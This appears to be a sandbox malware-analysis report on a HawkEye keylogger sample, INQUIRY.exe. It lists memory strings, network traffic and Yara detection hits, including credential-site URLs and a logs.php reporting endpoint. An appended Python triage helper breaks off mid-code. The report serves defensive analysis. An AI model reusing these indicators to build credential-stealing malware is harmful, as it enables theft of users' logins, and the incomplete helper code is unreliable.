ttps://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4421591https://consent.google.com/about:blankhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=3&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591 equals www.yahoo.com (Yahoo)
                    Source: unknown | DNS traffic detected: queries for: 121.205.6.0.in-addr.arpa
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                    Source: INQUIRY.exe, 00000001.00000003.656578776.0000000004FED000.00000004.00000001.sdmp | String found in binary or memory: http://en.w
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmp | String found in binary or memory: http://go.microsoft.
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmp | String found in binary or memory: http://go.microsoft.LinkId=42127
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp | String found in binary or memory: http://whatismyipaddress.com
                    Source: INQUIRY.exe, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp | String found in binary or memory: http://whatismyipaddress.com/
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp | String found in binary or memory: http://whatismyipaddress.com/-
                    Source: INQUIRY.exe, 00000001.00000003.659052456.0000000005013000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.659667033.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: INQUIRY.exe, 00000001.00000003.659667033.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.661195055.0000000005011000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com
                    Source: INQUIRY.exe, 00000001.00000003.659571445.0000000005016000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com$p
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com0p
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comMic
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comTC
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comTC(
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comTCE
                    Source: INQUIRY.exe, 00000001.00000003.660352640.0000000005011000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comandh
                    Source: INQUIRY.exe, 00000001.00000003.659772843.0000000005016000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comits
                    Source: INQUIRY.exe, 00000001.00000003.659772843.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
                    Source: INQUIRY.exe, 00000001.00000003.660352640.0000000005011000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comle
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660006267.0000000004FF6000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comn
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.como.
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comsm
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comtig
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
                    Source: INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: INQUIRY.exe, 00000001.00000003.664630621.000000000501B000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: INQUIRY.exe, 00000001.00000003.664546236.0000000005011000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlu
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
                    Source: INQUIRY.exe, 00000001.00000003.662998950.0000000005011000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersd
                    Source: INQUIRY.exe, 00000001.00000003.663957016.0000000005016000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designershq
                    Source: INQUIRY.exe, 00000001.00000003.664066811.0000000005016000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designerslb
                    Source: INQUIRY.exe, 00000001.00000003.664511180.0000000004FEF000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com=
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comTTFF
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comalsd=
                    Source: INQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comepko
                    Source: INQUIRY.exe, 00000001.00000003.664511180.0000000004FEF000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comessed
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comgrito
                    Source: INQUIRY.exe, 00000001.00000003.664511180.0000000004FEF000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comk
                    Source: INQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comlvfet
                    Source: INQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comm=
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comnc.
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.coms
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comsiv&
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
                    Source: INQUIRY.exe, 00000001.00000003.659052456.0000000005013000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.657519748.0000000005012000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: INQUIRY.exe, 00000001.00000003.666565645.0000000004FEF000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.661257796.0000000004FEB000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660714589.0000000004FE4000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/://w
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Treb
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/_
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/cheV
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp//
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/=
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s
                    Source: INQUIRY.exe, 00000001.00000003.660714589.0000000004FE4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s/
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/typo
                    Source: vbc.exe, 00000013.00000002.770041777.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: http://www.site.com/logs.php
                    Source: INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comic
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: INQUIRY.exe, vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: https://whatismyipaddress.com
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: https://whatismyipaddress.com/
                    Source: vbc.exe, 00000006.00000002.696465332.000000000084E000.00000004.00000040.sdmp, vbc.exe, 00000014.00000002.775214194.0000000000A2E000.00000004.00000040.sdmpString found in binary or memory: https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4
                    Source: INQUIRY.exe, vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49777
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49763
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49785
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49784
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49761
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49792
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49791
                    Source: unknown | Network traffic detected: HTTP traffic on port 49761 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49785 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49777 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49778 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49791 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49792 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49778

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    Yara detected HawkEye Keylogger
                    Source: Yara match | File source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001C.00000002.863232173.0000000002DE0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: WerFault.exe PID: 6776, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6808, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 5896, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6076, type: MEMORY
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
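The dump identifiers in the list above carry the triage information an analyst actually wants: which process instance and which execution stage each HawkEye match came from, at what address, and with what page protection. The following Python helper is an added example for reading them, not code from the Joe Sandbox report or from the sample. The field layout it assumes for the `*.sdmp` names is inferred from this page itself (`00000010.00000002.….00000000022E0000.….sdmp` lines up with `16.2.INQUIRY.exe.22e0000.1.unpack`: hex process index 0x10 is process 16, same stage, same base address); the two protection values are the standard winnt.h constants; the sixth `*.sdmp` field is left undecoded; and the 0x400000 image base plus the 1 MiB image size used to separate payload hits from unpacking buffers are assumptions, not values taken from the report.

```python
"""Triage helper: group the Yara-matched memory regions of a Joe Sandbox report by process.

Added example, not part of the original report. The *.sdmp field layout is inferred
from the report: "00000010.00000002.<id>.00000000022E0000.<prot>.<type>.sdmp" lines up
with "16.2.INQUIRY.exe.22e0000.1.unpack" (0x10 == 16, same stage, same base address).
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# Page-protection constants from winnt.h (only the two values present in the report).
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x40
PROTECT_NAMES = {PAGE_READWRITE: "RW", PAGE_EXECUTE_READWRITE: "RWX"}

# Assumptions: the hollowed-in payload lives at the 0x400000 image base seen in the
# "...exe.400000.0.unpack" names; 1 MiB is a guessed upper bound for its size.
IMAGE_BASE = 0x400000
IMAGE_SIZE = 0x100000

# <proc index>.<stage>.<dump id>.<base address>.<protection>.<region type>.sdmp
# (hex fields except the dump id; the region-type field is left undecoded here)
SDMP_RE = re.compile(
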